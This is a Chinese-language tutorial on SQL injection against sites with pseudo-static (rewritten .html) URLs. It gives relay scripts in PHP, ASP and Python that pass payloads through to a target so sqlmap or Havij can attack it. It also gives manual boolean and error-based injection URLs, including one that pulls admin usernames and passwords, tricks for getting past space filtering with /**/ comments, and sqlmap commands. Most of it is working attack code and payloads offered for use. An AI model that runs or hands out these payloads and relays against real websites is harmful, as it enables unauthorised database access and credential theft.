SQL injection 之(Pseudo-static injection)

摘要

我们现在看到的网站大部分都是 www.xxx.com/xxx.html
但是有一种是这样 www.xxx.com/index.php/id/xxx.html 这种我们称为的伪静态
通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了

0x01 介绍

我们现在看到的网站大部分都是 www.xxx.com/xxx.html
但是有一种是这样 www.xxx.com/index.php/id/xxx.html 这种我们称为的伪静态
通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了

http://www.xxx.com/news.php/id/1.html

0X02测试步骤：

中转注入的php代码:inject.php

<?php set_time_limit(0); $id=$_GET["id"]; $id=str_replace(” “,”%20″,$id); $id=str_replace(“=”,”%3D”,$id); //$url = "http://www.xxx.com/news.php/id/$id.html"; $url = "http://www.xxx.com/news.php/id/$id.html"; //echo $url;  $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0);  $output = curl_exec($ch); curl_close($ch); print_r($output); ?> 

0X03本地环境搭建PHP，

然后访问http://127.0.0.1/inject.php?id=1

通过sqlmap或者havj可以跑注入漏洞。

附录ASP中转代码：

<strong><font style="font-size: 12pt"><code id="code1"><% JmdcwName=request("id") JmStr=JmdcwName JmStr=URLEncoding(JmStr) JMUrl="http://192.168.235.7:8808/ad/blog/"&nbsp;&nbsp;//实际上要请求的网址 JMUrl=JMUrl & JmStr&".html"&nbsp; &nbsp; //拼接url response.write JMUrl&JmStr&nbsp; &nbsp; //我这里故意输出url来看 'JmRef="http://127.0.0.1/6kbbs/bank.asp" JmCok="" JmCok=replace(JmCok,chr(32),"%20")  JmStr=URLEncoding(JmStr)&nbsp;&nbsp;  response.write&nbsp;&nbsp;PostData(JMUrl,JmStr,JmCok,JmRef) //url,查询字符串，cookie，referer字段  Function PostData(PostUrl,PostStr,PostCok,PostRef)&nbsp;&nbsp; Dim Http Set Http = Server.CreateObject("msxml2.serverXMLHTTP") With Http .Open "GET",PostUrl,False .Send () PostData = .ResponseBody End With Set Http = Nothing PostData =bytes2BSTR(PostData) End Function   Function bytes2BSTR(vIn)&nbsp; &nbsp;//处理返回的信息 Dim strReturn Dim I, ThisCharCode, NextCharCode strReturn = "" For I = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn, I, 1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn, I + 1, 1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) I = I + 1 End If Next bytes2BSTR = strReturn End Function  Function URLEncoding(vstrin)&nbsp; &nbsp; //发包前对参数的url编码一下 strReturn="" Dim i 'vstrin=replace(vstrin,"%","%25") '增加转换搜索字符, 'vstrin=Replace(vstrin,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20 'vstrin=Replace(vstrin,chr(43),"%2B")&nbsp;&nbsp;'JMDCW增加转换+字符 vstrin=Replace(vstrin,chr(32),"/**/")&nbsp;&nbsp;'在此增加要过滤的代码 //这里很关键，方便啊，把空格自动换成/**/，后面会说到的 For i=1 To Len(vstrin) ThisChr=Mid(vstrin,i,1) if Abs(Asc(ThisChr))< &HFF Then strReturn=strReturn & ThisChr Else InnerCode=Asc(ThisChr) If InnerCode<0 Then InnerCode=InnerCode + &H10000 End If Hight1=(InnerCode And &HFF00) /&HFF Low1=InnerCode And &HFF strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1) End if Next URLEncoding=strReturn End Function  %></code></font></strong> 

0x04 测试

1.http://www.xxx.com/play/Diablo.html  http://www.xxx.com/down/html/?772.html 

2.测试注入：

http://www.xxx.com/down/html/?772′.html  http://www.xxx.com /play/Diablo'.html  http://www.xxx.com/play/Diablo'/**/and /**/1='1 /*.html  http://www.xxx.com/play/Diablo' /**/and /**/1='2 /*.html  http://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html 正常  http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html 出错 

3.看页面是否存在差异，相同则不存在，不同存在注入。

4.联合查询：

http://www.xxx.com/play/diablo’ and 1=2 union select 1,2… frominformation_schema.columns where 1='1.html  http://www.xxx.com/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html 

三、手工注入法（二）

http://www.xxx.net/news/html/?410.html  http://www.xxx.net/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html 

注：

伪静态的注入和URL的普通GET注入不太相同
。普通url的get注入的%20,%23,+等都可以用；但是伪静态不行，会被直接传递到到url中，所以用/**/这个注释符号表示空格。

三、SQLmap方法

在sqlmap中伪静态哪儿存在注入点就加*

http://www.cunlide.com/id1/1/id2/2 python   sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″  http://www.xxx.com/news/class/?103.htm  python  sqlmap.py -u  “http://www.xxx.com/news/class/?103*.html” 

0X05 python脚本方法

代码一：

复制代码
1 <code id="code3">from BaseHTTPServer import *
2 import urllib2
3 class MyHTTPHandler(BaseHTTPRequestHandler):
4 def do_GET(self):
5 path=self.path
6 path=path[path.find(‘id=’)+3:]
7 proxy_support = urllib2.ProxyHandler({“http”:”http://127.0.0.1:8087"})
8 opener = urllib2.build_opener(proxy_support)
9 urllib2.install_opener(opener)
10 url=”http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/“
11 try:
12 response=urllib2.urlopen(url+path)
13 html=response.read()
14 except urllib2.URLError,e:
15 html=e.read()
16 self.wfile.write(html)
17 server = HTTPServer((“”, 8000), MyHTTPHandler)
18 server.serve_forever()</code>

0x06 参考文献

https://www.cnblogs.com/qunshu/p/3285966.html
http://blog.csdn.net/foryouslgme/article/details/52778657
https://www.webshell.cc/2436.html